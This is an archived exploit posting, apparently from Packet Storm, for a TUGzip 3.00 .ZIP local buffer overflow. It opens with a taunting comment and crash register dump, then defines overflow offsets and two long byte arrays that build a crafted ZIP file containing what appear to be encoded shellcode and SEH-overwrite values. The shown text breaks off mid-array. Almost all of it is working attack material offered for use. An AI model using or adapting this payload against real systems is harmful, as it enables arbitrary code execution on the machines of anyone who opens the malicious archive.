tugzip-overflow.txt

2008-10-27T00:00:00
ID PACKETSTORM:71235
Type packetstorm
Reporter fl0 fl0w
Modified 2008-10-27T00:00:00

Description

                                        
                                            `/*0day TUGzip 3.00 archiver .ZIP File Local Buffer Overflow  
"If you change things ,forever,there's no going back,you see for them you're just a freak, like me ..Mhaaaahaaaaaaaaaaaaaaaaaaaa"(JK)  
Well hello there ,greetz from Romania,here is a exploit for the archiver TUGzip.  
So the payload doesen't always execute,it's just a matter of patience,from 10   
attemps you get success on 2 in the best case.Got 3 more archivers with stack  
overflow and heap overflow,I'm bored... I'm looking for a new approach,will see  
soon what I'm going to bring you.  
"Let's put a smile on that face Mhaaaaaaaaahhaaahaaahhhhhhaaaaaaaaaaaaaaaaaa"  
Credits go to Stefan Marin or fl0 fl0w :) .  
All the best !  
  
Registers  
EAX 00000000  
ECX 00000064  
EDX 0013F6D0  
EBX 0117ABDC  
ESP 0013F6D0  
EBP 45444342  
ESI 0117AF6C  
EDI 00D88B1C  
EIP 58585858  
  
SEH chain of main thread, item 0  
Address=0013F6D0  
SE handler=C9C9C9C9  
  
*/  
#include<stdio.h>  
#include<stdlib.h>  
#include<string.h>  
#include<windows.h>  
  
#define OFFSET 2504  
#define NOP 2515   
#define shellcode_offset 2535  
  
  
char file_1[]=  
"\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x08\x00\x00\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x66\x66\x64\x73\x75\x69\x62\x7A\x65\x6F\x69\x76\x7A\x20\x66\x68"  
"\x65\x6F\x20\x79\x66\x6F\x7A\x69\x61\x71\x20\x6F\x69\x65\x61\x7A"  
"\x75\x20\x7A\x71\x6F\x66\x68\x75\x65\x7A\x71\x6F\x69\x65\x6E\x66"  
"\x65\x7A\x6A\x75\x71\x63\x62\x75\x71\x70\x7A\x61\x7A\x69\x27\x74"  
"\x75\x72\x65\x6F\x7A\x6E\x62\x69\x6A\x75\x76\x62\x67\x73\x64\x75"  
"\x69\x71\x79\x72\x7A\x61\x6A\x20\x62\x63\x73\x64\x6F\x70\x69\x75"  
"\x72\x79\x7A\x6F\x65\x61\x71\x6E\x62\x69\x6F\x64\x73\x79\x72\x66"  
"\x65\x7A\x71\x6F\x69\x70\x62\x75\x66\x63\x73\x71\x69\x75\x79\x72"  
"\x61\x7A\x62\x69\x6A\x65\x66\x62\x68\x73\x75\x69\x71\x76\x64\x73"  
"\x71\x69\x6A\x62\x66\x65\x7A\x71\x75\x61\x66\x64\x64\x64\x64\x64"  
"\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x68\x68"  
"\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x75\x75\x75"  
"\x75\x75\x75\x75\x75\x75\x75\x75\x68\x76\x71\x24\x69\x66\x72\x7A"  
"\x65\x6F\x62\x76\x69\x6F\x7A\x65\x71\x66\x74\x72\x65\x6F\x7A\x71"  
"\x6A\x6E\x62\x76\x64\x73\x70\x69\x79\x75\x66\x71\x6F\x65\x69\x68"  
"\x66\x72\x6F\x75\x65\x7A\x68\x61\x72\x62\x20\x69\x76\x66\x64\x73"  
"\x70\x6F\x68\x6A\x72\x65\x71\x6F\x75\x68\x66\x7A\x65\x61\x71\x75"  
"\x68\x76\x71\x6F\x75\x68\x65\x66\x6F\x71\x73\x69\x6A\x68\x64\x6F"  
"\x73\x71\x68\x76\x64\x6F\x69\x68\x7A\x61\x71\x6F\x65\x69\x68\x66"  
"\x64\x73\x6F\x69\x75\x68\x76\x63\x78\x77\x69\x75\x68\x66\x71\x6F"  
"\x75\x69\x68\x76\x77\x78\x6F\x69\x68\x66\x64\x73\x71\x6F\x69\x68"  
"\x76\x64\x73\x71\x6F\x69\x75\x68\x7A\x67\x66\x6F\x69\x68\x73\x64"  
"\x71\x6F\x69\x75\x68\x67\x7A\x65\x71\x6F\x69\x68\x67\x73\x71\x6F"  
"\x69\x68\x67\x7A\x61\x65\x7A\x72\x75\x79\x61\x75\x79\x74\x61\x65"  
"\x70\x69\x75\x79\x55\x59\x54\x4F\x5A\x52\x45\x50\x49\x48\x47\x41"  
"\x5A\x55\x59\x56\x44\x53\x4F\x49\x59\x54\x41\x50\x4F\x49\x55\x45"  
"\x59\x52\x49\x55\x45\x5A\x59\x47\x42\x4B\x4A\x43\x58\x4E\x4B\x56"  
"\x4E\x4B\x43\x58\x42\x57\x56\x4B\x4A\x4E\x42\x43\x58\x48\x42\x4B"  
"\x4A\x44\x48\x46\x4F\x49\x48\x5A\x45\x52\x4F\x49\x55\x48\x45\x5A"  
"\x55\x49\x4F\x41\x42\x45\x5A\x55\x49\x42\x47\x55\x49\x56\x43\x50"  
"\x4C\x44\x53\x47\x57\x4B\x52\x54\x42\x4E\x49\x55\x43\x49\x55\x4F"  
"\x51\x45\x42\x48\x52\x55\x49\x59\x44\x46\x51\x50\x5A\x49\x55\x45"  
"\x52\x50\x49\x55\x44\x59\x46\x54\x50\x41\x49\x5A\x55\x45\x59\x52"  
"\x5A\x45\x55\x48\x52\x54\x49\x55\x50\x56\x58\x57\x4B\x4A\x43\x4E"  
"\x48\x42\x47\x50\x46\x4F\x49\x55\x50\x41\x49\x52\x59\x45\x5A\x4F"  
"\x41\x49\x54\x59\x38\x37\x33\x32\x39\x35\x36\x35\x39\x34\x38\x33"  
"\x32\x36\x35\x46\x53\x34\x38\x59\x46\x44\x53\x39\x38\x59\x55\x56"  
"\x47\x30\x39\x38\x51\x59\x55\x52\x30\x39\x38\x34\x59\x35\x32\x33"  
"\x39\x38\x41\x59\x39\x46\x38\x45\x51\x59\x5A\x35\x39\x38\x59\x36"  
"\x39\x38\x46\x47\x59\x39\x38\x51\x59\x39\x47\x46\x44\x53\x55\x59"  
"\x30\x39\x48\x34\x5A\x48\x33\x37\x38\x35\x32\x33\x31\x42\x34\x47"  
"\x38\x30\x47\x46\x44\x53\x55\x49\x42\x56\x51\x49\x55\x4F\x59\x50"  
"\x52\x39\x5A\x48\x46\x44\x53\x51\x55\x49\x47\x46\x47\x44\x55\x53"  
"\x53\x53\x53\x53\x45\x47\x46\x39\x32\x47\x35\x33\x34\x55\x47\x46"  
"\x39\x49\x53\x50\x47\x42\x55\x54\x50\x5A\x39\x38\x59\x35\x33\x41"  
"\x41\x42\x43\x43\x46\x52\x45\x43\x43\x45\x54\x52\x45\x5A\x47\x52"  
"\x46\x44\x53\x49\x4F\x5A\x48\x45\x52\x42\x4E\x4F\x56\x46\x44\x53"  
"\x4F\x49\x52\x48\x54\x4F\x5A\x49\x4E\x46\x47\x44\x4B\x4E\x46\x43"  
"\x58\x4C\x4B\x59\x89\x05\x8A\x9B\x98\x98\x98\x4F\x49\x49\x49\x49"  
"\x49\x49\x51\x5A\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42"  
"\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48"  
"\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44"  
"\x41\x56\x58\x34\x5A\x38\x42\x44\x4A\x4F\x4D\x4E\x4F\x4C\x36\x4B"  
"\x4E\x4D\x54\x4A\x4E\x49\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x42\x36\x4B"  
"\x38\x4E\x46\x46\x42\x46\x42\x4B\x58\x45\x44\x4E\x43\x4B\x38\x4E"  
"\x37\x45\x30\x4A\x57\x41\x50\x4F\x4E\x4B\x48\x4F\x34\x4A\x51\x4B"  
"\x38\x4F\x45\x42\x32\x41\x30\x4B\x4E\x49\x44\x4B\x38\x46\x43\x4B"  
"\x58\x41\x50\x50\x4E\x41\x43\x42\x4C\x49\x59\x4E\x4A\x46\x58\x42"  
"\x4C\x46\x37\x47\x30\x41\x4C\x4C\x4C\x4D\x30\x41\x30\x44\x4C\x4B"  
"\x4E\x46\x4F\x4B\x33\x46\x35\x46\x32\x4A\x52\x45\x57\x45\x4E\x4B"  
"\x48\x4F\x35\x46\x42\x41\x30\x4B\x4E\x48\x36\x4B\x58\x4E\x50\x4B"  
"\x54\x4B\x48\x4F\x35\x4E\x41\x41\x30\x4B\x4E\x43\x30\x4E\x52\x4B"  
"\x58\x49\x48\x4E\x56\x46\x32\x4E\x31\x41\x36\x43\x4C\x41\x43\x4B"  
"\x4D\x46\x56\x4B\x48\x43\x44\x42\x53\x4B\x48\x42\x44\x4E\x50\x4B"  
"\x38\x42\x37\x4E\x41\x4D\x4A\x4B\x48\x42\x44\x4A\x30\x50\x45\x4A"  
"\x36\x50\x38\x50\x44\x50\x30\x4E\x4E\x42\x35\x4F\x4F\x48\x4D\x48"  
"\x46\x43\x45\x48\x56\x4A\x46\x43\x43\x44\x33\x4A\x56\x47\x37\x43"  
"\x37\x44\x43\x4F\x55\x46\x45\x4F\x4F\x42\x4D\x4A\x36\x4B\x4C\x4D"  
"\x4E\x4E\x4F\x4B\x33\x42\x55\x4F\x4F\x48\x4D\x4F\x45\x49\x58\x45"  
"\x4E\x48\x56\x41\x48\x4D\x4E\x4A\x50\x44\x30\x45\x35\x4C\x36\x44"  
"\x50\x4F\x4F\x42\x4D\x4A\x36\x49\x4D\x49\x50\x45\x4F\x4D\x4A\x47"  
"\x45\x4F\x4F\x48\x4D\x43\x55\x43\x45\x43\x35\x43\x35\x43\x35\x43"  
"\x54\x43\x55\x43\x54\x43\x35\x4F\x4F\x42\x4D\x48\x46\x4A\x56\x41"  
"\x41\x4E\x45\x48\x56\x43\x45\x49\x48\x41\x4E\x45\x59\x4A\x46\x46"  
"\x4A\x4C\x31\x42\x57\x47\x4C\x47\x55\x4F\x4F\x48\x4D\x4C\x36\x42"  
"\x41\x41\x35\x45\x45\x4F\x4F\x42\x4D\x4A\x56\x46\x4A\x4D\x4A\x50"  
"\x32\x49\x4E\x47\x35\x4F\x4F\x48\x4D\x43\x55\x45\x45\x4F\x4F\x42"  
"\x4D\x4A\x56\x45\x4E\x49\x54\x48\x58\x49\x44\x47\x45\x4F\x4F\x48"  
"\x4D\x42\x35\x46\x55\x46\x55\x45\x55\x4F\x4F\x42\x4D\x43\x39\x4A"  
"\x36\x47\x4E\x49\x47\x48\x4C\x49\x57\x47\x45\x4F\x4F\x48\x4D\x45"  
"\x55\x4F\x4F\x42\x4D\x48\x46\x4C\x56\x46\x36\x48\x36\x4A\x56\x43"  
"\x46\x4D\x36\x49\x48\x45\x4E\x4C\x46\x42\x45\x49\x35\x49\x32\x4E"  
"\x4C\x49\x38\x47\x4E\x4C\x56\x46\x34\x49\x58\x44\x4E\x41\x43\x42"  
"\x4C\x43\x4F\x4C\x4A\x50\x4F\x44\x54\x4D\x32\x50\x4F\x44\x34\x4E"  
"\x52\x43\x39\x4D\x38\x4C\x37\x4A\x33\x4B\x4A\x4B\x4A\x4B\x4A\x4A"  
"\x56\x44\x57\x50\x4F\x43\x4B\x48\x41\x4F\x4F\x45\x37\x46\x44\x4F"  
"\x4F\x48\x4D\x4B\x45\x47\x45\x44\x55\x41\x35\x41\x45\x41\x35\x4C"  
"\x36\x41\x30\x41\x55\x41\x45\x45\x45\x41\x45\x4F\x4F\x42\x4D\x4A"  
"\x46\x4D\x4A\x49\x4D\x45\x30\x50\x4C\x43\x55\x4F\x4F\x48\x4D\x4C"  
"\x36\x4F\x4F\x4F\x4F\x47\x43\x4F\x4F\x42\x4D\x4B\x48\x47\x45\x4E"  
"\x4F\x43\x58\x46\x4C\x46\x46\x4F\x4F\x48\x4D\x44\x45\x4F\x4F\x42"  
"\x4D\x4A\x56\x42\x4F\x4C\x48\x46\x50\x4F\x45\x43\x55\x4F\x4F\x48"  
"\x4D\x4F\x4F\x42\x4D\x5A\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x41\x49\x89\x04\x02\x12\x01\x61\x82\xFD\x81\x98\x98\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x2E\x74"  
"\x78\x74\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC"  
"\xCE\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x08"  
"\x00\x00\x00\x00\x00\x00\x01\x00\x24\x00\x00\x00\x00\x00\x00\x00"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"  
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"  
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x43\x43\x43\x43\x43\x43\x43\x43\x43"  
"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x41\x42\x43\x44\x45\x58\x58\x58\x58\x41\x41\x41\x41";  
  
char file_2[]=  
"\x41\x41\x41\x41\xCC\xCC\xCC\xCC\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"  
"\x41\x41\x41\x41\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x4A\x4A\x4A\x4A\x4A\x4A"  
"\x4A\x4A\x4A\x4A\x4A\x4A\x4A\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B"  
"\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C"  
"\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x4D\x4D\x4D\x4D\x4D\x4D\x4D\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E"  
"\x4E\x4E\x4E\x4E\x4E\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x4F\x4F\x4F\x4F"  
"\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x50\x50\x50\x50\x50\x50"  
"\x50\x50\x50\x50\x50\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x51\x51\x51\x51\x51\x51\x51"  
"\x51\x51\x32\x32\x32\x32\x32\x89\x03\x59\x89\x05\x8A\x9B\x98\x98"  
"\x98\x4F\x49\x49\x49\x49\x49\x49\x51\x5A\x56\x54\x58\x36\x33\x30"  
"\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56"  
"\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42"  
"\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5A\x38\x42\x44\x4A\x4F"  
"\x4D\x4E\x4F\x4C\x36\x4B\x4E\x4D\x54\x4A\x4E\x49\x4F\x4F\x4F\x4F"  
"\x4F\x4F\x4F\x42\x36\x4B\x38\x4E\x46\x46\x42\x46\x42\x4B\x58\x45"  
"\x44\x4E\x43\x4B\x38\x4E\x37\x45\x30\x4A\x57\x41\x50\x4F\x4E\x4B"  
"\x48\x4F\x34\x4A\x51\x4B\x38\x4F\x45\x42\x32\x41\x30\x4B\x4E\x49"  
"\x44\x4B\x38\x46\x43\x4B\x58\x41\x50\x50\x4E\x41\x43\x42\x4C\x49"  
"\x59\x4E\x4A\x46\x58\x42\x4C\x46\x37\x47\x30\x41\x4C\x4C\x4C\x4D"  
"\x30\x41\x30\x44\x4C\x4B\x4E\x46\x4F\x4B\x33\x46\x35\x46\x32\x4A"  
"\x52\x45\x57\x45\x4E\x4B\x48\x4F\x35\x46\x42\x41\x30\x4B\x4E\x48"  
"\x36\x4B\x58\x4E\x50\x4B\x54\x4B\x48\x4F\x35\x4E\x41\x41\x30\x4B"  
"\x4E\x43\x30\x4E\x52\x4B\x58\x49\x48\x4E\x56\x46\x32\x4E\x31\x41"  
"\x36\x43\x4C\x41\x43\x4B\x4D\x46\x56\x4B\x48\x43\x44\x42\x53\x4B"  
"\x48\x42\x44\x4E\x50\x4B\x38\x42\x37\x4E\x41\x4D\x4A\x4B\x48\x42"  
"\x44\x4A\x30\x50\x45\x4A\x36\x50\x38\x50\x44\x50\x30\x4E\x4E\x42"  
"\x35\x4F\x4F\x48\x4D\x48\x46\x43\x45\x48\x56\x4A\x46\x43\x43\x44"  
"\x33\x4A\x56\x47\x37\x43\x37\x44\x43\x4F\x55\x46\x45\x4F\x4F\x42"  
"\x4D\x4A\x36\x4B\x4C\x4D\x4E\x4E\x4F\x4B\x33\x42\x55\x4F\x4F\x48"  
"\x4D\x4F\x45\x49\x58\x45\x4E\x48\x56\x41\x48\x4D\x4E\x4A\x50\x44"  
"\x30\x45\x35\x4C\x36\x44\x50\x4F\x4F\x42\x4D\x4A\x36\x49\x4D\x49"  
"\x50\x45\x4F\x4D\x4A\x47\x45\x4F\x4F\x48\x4D\x43\x55\x43\x45\x43"  
"\x35\x43\x35\x43\x35\x43\x54\x43\x55\x43\x54\x43\x35\x4F\x4F\x42"  
"\x4D\x48\x46\x4A\x56\x41\x41\x4E\x45\x48\x56\x43\x45\x49\x48\x41"  
"\x4E\x45\x59\x4A\x46\x46\x4A\x4C\x31\x42\x57\x47\x4C\x47\x55\x4F"  
"\x4F\x48\x4D\x4C\x36\x42\x41\x41\x35\x45\x45\x4F\x4F\x42\x4D\x4A"  
"\x56\x46\x4A\x4D\x4A\x50\x32\x49\x4E\x47\x35\x4F\x4F\x48\x4D\x43"  
"\x55\x45\x45\x4F\x4F\x42\x4D\x4A\x56\x45\x4E\x49\x54\x48\x58\x49"  
"\x44\x47\x45\x4F\x4F\x48\x4D\x42\x35\x46\x55\x46\x55\x45\x55\x4F"  
"\x4F\x42\x4D\x43\x39\x4A\x36\x47\x4E\x49\x47\x48\x4C\x49\x57\x47"  
"\x45\x4F\x4F\x48\x4D\x45\x55\x4F\x4F\x42\x4D\x48\x46\x4C\x56\x46"  
"\x36\x48\x36\x4A\x56\x43\x46\x4D\x36\x49\x48\x45\x4E\x4C\x46\x42"  
"\x45\x49\x35\x49\x32\x4E\x4C\x49\x38\x47\x4E\x4C\x56\x46\x34\x49"  
"\x58\x44\x4E\x41\x43\x42\x4C\x43\x4F\x4C\x4A\x50\x4F\x44\x54\x4D"  
"\x32\x50\x4F\x44\x34\x4E\x52\x43\x39\x4D\x38\x4C\x37\x4A\x33\x4B"  
"\x4A\x4B\x4A\x4B\x4A\x4A\x56\x44\x57\x50\x4F\x43\x4B\x48\x41\x4F"  
"\x4F\x45\x37\x46\x44\x4F\x4F\x48\x4D\x4B\x45\x47\x45\x44\x55\x41"  
"\x35\x41\x45\x41\x35\x4C\x36\x41\x30\x41\x55\x41\x45\x45\x45\x41"  
"\x45\x4F\x4F\x42\x4D\x4A\x46\x4D\x4A\x49\x4D\x45\x30\x50\x4C\x43"  
"\x55\x4F\x4F\x48\x4D\x4C\x36\x4F\x4F\x4F\x4F\x47\x43\x4F\x4F\x42"  
"\x4D\x4B\x48\x47\x45\x4E\x4F\x43\x58\x46\x4C\x46\x46\x4F\x4F\x48"  
"\x4D\x44\x45\x4F\x4F\x42\x4D\x4A\x56\x42\x4F\x4C\x48\x46\x50\x4F"  
"\x45\x43\x55\x4F\x4F\x48\x4D\x4F\x4F\x42\x4D\x5A\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x41\x49\x89\x04\x02\x12\x01\x61"  
"\x82\xFD\x81\x98\x98\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
